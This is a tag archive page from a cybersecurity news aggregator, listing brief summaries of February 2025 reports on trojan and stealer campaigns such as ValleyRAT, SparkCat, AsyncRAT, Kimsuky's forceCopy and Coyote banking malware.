TROJAN – Cybersecurity News Everyday

FinStealer

February 8, 2025 Cyfirma

This article discusses a sophisticated malware campaign targeting a leading Indian bank through fake mobile applications, advancing financial fraud via credential theft and social engineering. Key tactics include phishing links, dynamic payloads, and encrypted communications with C2 servers. The malware’s primary objective is to steal credentials and sensitive data for financial gain.…

Threat Research

From Chatbots to Cyberattacks: How AI is Helping Hackers Stay One Step Ahead

February 7, 2025February 7, 2025 iocOne

A malware analysis recounts the author’s unexpected infection through a seemingly innocent wallpaper download. The malware, partially generated by AI, was sophisticated, capable of stealing credentials and actively evading detection. The piece serves as both a cautionary tale and a learning resource for cybersecurity best practices.…

Trash

Monthly Threat Actor Group Intelligence Report, November 2024 (ENG) – Red Alert

February 7, 2025February 7, 2025 iocOne

In November 2024, ten hacking groups were detected engaging in various cybercriminal activities, including stealing sensitive information, deploying ransomware, and mining cryptocurrency. Each group employed different methods such as phishing, malware distribution, and obfuscation techniques to achieve their objectives, often targeting companies and individuals across multiple countries.…

Cyber Security News

Fake Google Chrome Sites Distribute ValleyRAT Malware via DLL Hijacking

February 7, 2025 CybersecurityNews

Summary: Bogus websites posing as Google Chrome distributors have been employed to spread a remote access trojan known as ValleyRAT, attributed to the Silver Fox threat actor. This malware primarily targets key organizational roles in financial and sales sectors within Chinese-speaking regions, utilizing sophisticated attack chains to deploy other malicious software.…

Cyber Security News

North Korean APT Kimsuky Uses forceCopy Malware to Steal Browser-Stored Credentials

February 6, 2025 CybersecurityNews

Summary: The North Korea-affiliated hacking group Kimsuky has been identified as executing spear-phishing attacks using a malware named forceCopy, which targets web browser configuration files for credential theft. Their attacks involve deceptive emails that contain malicious Windows shortcuts leading to secondary payload downloads, including trojans and proxy malware.…

Threat Research

University site cloned to evade ad detection distributes fake Cisco installer

February 6, 2025 Malwarebytes

This article discusses the methods used by attackers in the online advertising sector, particularly through malvertising campaigns. It highlights a specific case involving a fake Google ad for Cisco AnyConnect that redirected users to a phishing site and ultimately distributed the NetSupport RAT Trojan. Attackers employed clever disguises, such as impersonating a legitimate university, while relying on newly registered domains to bypass detection systems.…

Cyber Security News

New ValleyRAT Malware Variant Spreads via Fake Chrome Downloads

February 6, 2025 Cyware

Summary: Morphisec Threat Lab has identified a new variant of the ValleyRAT malware that leverages advanced evasion techniques and multi-stage infection methods targeting high-value individuals, especially in finance and sales sectors. This malware is being distributed through phishing emails, messaging platforms, and compromised websites, with a notable new delivery method involving a fake Chinese telecom website.…

Cyber Security News

SparkCat Malware Uses OCR to Extract Crypto Wallet Recovery Phrases from Images

February 6, 2025 CybersecurityNews

Summary: A new malware campaign named SparkCat has been discovered, exploiting fraudulent apps on both Apple’s App Store and Google’s Play Store to steal cryptocurrency wallet recovery phrases. The malware utilizes an OCR model to extract sensitive information from users’ photo libraries and sends it to an external server.…

Threat Research

AsyncRAT Reloaded: Using Python and TryCloudflare for Malware Delivery Again

February 6, 2025 Securonix

The Forcepoint X-Labs research team has uncovered a new AsyncRAT malware campaign, utilizing malicious payloads via TryCloudflare quick tunnels and disguised Python packages. The attack initiates with a phishing email containing a Dropbox link, which leads to a complex series of downloads that mislead users into executing malware while presenting a legitimate PDF.…

Threat Research

ALPHV Ransomware: Analyzing the BlackCat After Change Healthcare Attack

February 6, 2025 Picussecurity

The ALPHV ransomware group, also known as BlackCat, has emerged as a significant threat by operating under a Ransomware-as-a-Service model. They caused a major healthcare data breach in February 2024, affecting over 100 million individuals when they attacked Change Healthcare, a subsidiary of UnitedHealth Group. The incident prompted UnitedHealth to pay a million ransom.…

Threat Research

Take my money: OCR crypto stealers in Google Play and App Store

February 6, 2025 SecureList

In March 2023, malware was detected in various messaging app mods that targeted Android and Windows users, focusing on crypto wallet recovery phrases found in users’ image galleries. This campaign, dubbed “SparkCat,” utilized OCR technology to exfiltrate sensitive data and has been identified in both the Google Play Store and Apple’s App Store.…

Cyber Security News

AsyncRAT Abusing Python and Cloudflare Tunnels for Stealthy Malware Delivery

February 6, 2025 Cyware

Summary: Forcepoint’s X-Labs has identified a new malware campaign leveraging AsyncRAT, Python scripting, and TryCloudflare tunnels for stealthy payload delivery. This campaign illustrates a growing trend of attackers using legitimate infrastructure to obscure their malicious activities, posing a significant cybersecurity threat. Through a detailed multi-stage infection process, the attackers manage to bypass traditional security measures, emphasizing the need for enhanced detection strategies.…

Cyber Security News

AsyncRAT Campaign Uses Python Payloads and TryCloudflare Tunnels for Stealth Attacks

February 5, 2025 CybersecurityNews

Summary: A malware campaign delivering the AsyncRAT, a remote access trojan, has been identified utilizing Python payloads and TryCloudflare tunnels. Attackers employ phishing emails to initiate the attack, misleading users into downloading malicious payloads while masquerading as legitimate documents and URLs. This campaign highlights the evolving tactics of cybercriminals using trusted infrastructure to exploit vulnerabilities in user trust.…

Threat Research

Persistent Threats from the Kimsuky Group Using RDP Wrapper

February 5, 2025 Ahnlab

This article discusses the continued cyber attacks by the Kimsuky group, highlighting their use of various malware types, including the PebbleDash backdoor and custom RDP Wrapper. The group utilizes refined tactics such as spear-phishing with malicious shortcut files, proxy tools for external access, keyloggers, and information-stealing malware to compromise systems.…

Cyber Attack

CL-STA-0048: Chinese-Linked APT Targets Telecoms in South Asia

February 4, 2025 LeakNews

Summary: A newly identified cyberespionage campaign, tracked as CL-STA-0048, has been revealed by Unit 42, primarily targeting high-value organizations in South Asia, particularly a telecommunications company. The campaign, attributed to a nation-state actor likely linked to China, employed sophisticated tactics for intelligence gathering and data exfiltration.…

Threat Research

CyberDefenders Write-up: 3CX Supply Chain

February 4, 2025February 4, 2025 iocOne

Amid reports of issues with the 3CX Desktop App, a multinational corporation suspects a supply chain attack that compromised the software. Unusual network traffic and performance degradation led to the discovery of malware associated with recent updates. Investigation points towards North Korea’s Lazarus group as the potential threat actor.…

Cyber Security News

XE Group Cybercrime Gang Moves from Credit Card Skimming to Zero-Day Exploits

February 4, 2025 CybersecurityNews

Summary: Researchers have uncovered that the Vietnamese cybercrime group XE Group has shifted its tactics to exploit zero-day vulnerabilities in the VeraCore enterprise software, previously targeting credit card-skimming. This investigation highlights their unauthorized access and deployment of malicious tools to exfiltrate data and compromise network security.…

Cyber Security News

Coyote Malware Expands Reach: Now Targets 1,030 Sites and 73 Financial Institutions

February 3, 2025 CybersecurityNews

Summary: Brazilian Windows users are being targeted by a sophisticated banking malware campaign known as Coyote, which executes various malicious activities like keylogging and credential theft. Initially delivered through LNK files that run PowerShell commands, this malware can extract sensitive information from over 1,030 websites and 73 financial agents.…

Cyber Attack

Winterthur Media Outlets Hit by Cyberattack Disrupting Live Broadcasts

February 3, 2025 Monitorman

Date Reported: 2025-02-02 Country: CHE | Switzerland Victim: Radio Top, Tele Top | Radio Top, Tele Top Website: toponline.ch Information : Winterthur media outlets were targeted in a cyberattack over the weekend. The attack disrupted live broadcasts and production for Radio Top and Tele Top. A cryptographic Trojan was responsible for the attack, affecting the company’s systems.…

Tag: TROJAN